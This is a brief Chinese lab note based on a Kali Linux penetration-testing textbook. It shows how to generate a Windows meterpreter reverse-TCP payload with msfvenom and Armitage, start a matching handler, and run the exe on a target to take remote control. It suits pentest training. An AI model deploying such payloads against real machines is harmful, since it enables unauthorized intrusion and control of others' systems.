说明
按照《Kali Linux2 网络渗透测试实践指南 第二版 》第八章操作
仅供学习讨论使用,请勿进行非法操作
使用 Armitage生成被控端和主控端
选中“payload”, 然后选择“windows” ➡️“meterpreter”, 找到所需的攻击载荷(即meterpreter_reverse_tcp)来充当被控端。
图中所示的设置为攻击载荷创建了一个主控端,Metasploit也将这个主控端称为handler。但是我们可能要控制多个攻击载荷,所以要将这个handler设置得跟攻击载荷一样。产生攻击载荷的命令如下:
这里LHOST为192.168.229.133,即kali所在主机
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.229.133 LPORT=12076 -f exe -o /root/payload.exe
使用相同的步骤,产生一个被控端,这里需要注意,端口也要设置为上面一样的值,否则无法监听到,即12076,“Output”处选择要输出的格式,这里设置为exe,如图所示:
单击“Launch”按钮,会产生一个基于meterpreter_reverse_tcp的被控端,并保存我们需要的攻击载荷exe文件。接下来,目标主机上执行这个攻击载荷,就可以使用这个handler来控制目标主机了。
现在将攻击载荷移动到目标主机中,执行攻击载荷后,切回Armitage可以从远程控制目标主机了。如下图所示: